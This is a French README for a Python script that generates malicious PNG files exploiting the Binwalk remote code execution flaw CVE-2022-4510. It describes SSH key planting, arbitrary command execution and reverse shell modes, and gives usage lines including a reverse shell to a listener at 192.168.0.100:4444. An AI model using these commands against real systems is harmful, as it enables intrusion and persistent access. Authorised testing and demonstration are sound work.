
Un script Python pour générer des exploits ciblant la RCE CVE-2022-4510 de Binwalk. Il prend en charge les options SSH, l'exécution de commande et le shell inverse. Les exploits sont enregistrés au format PNG. Idéal pour les tests et les démonstrations.
Ce script vous permet de générer des exploits pour cibler les vulnérabilités CVE-2022-4510 Binwalk. Les exploits peuvent être utilisés pour des tests et des démonstrations. Les options prises en charge incluent SSH, l'exécution de commandes et le reverse shell.
ssh : Générer un exploit pour SSH.
file : Chemin vers le fichier .png d'entrée.pub : Chemin vers le fichier de clé publique.command : Générer un exploit pour exécuter une commande.
--command : Commande à exécuter.file : Chemin vers le fichier .png d'entrée.reverse : Générer un exploit pour un reverse shell.
file : Chemin vers le fichier .png d'entrée.ip : Adresse IP de l'écouteur.port : Numéro de port de l'écouteur.Exemples d'utilisation :
python exploit_generator.py ssh input.png public_key.pub
python exploit_generator.py command --command "ls -l" input.png
python exploit_generator.py reverse input.png 192.168.0.100 4444
L'exploit généré sera sauvegardé sous le nom binwalk_exploit.png dans le répertoire courant.
Utilisez ce script de manière responsable et uniquement sur les systèmes pour lesquels vous avez l'autorisation de tester ou de démontrer des vulnérabilités. L'auteur n'est pas responsable de toute utilisation illégale ou non autorisée de ce script.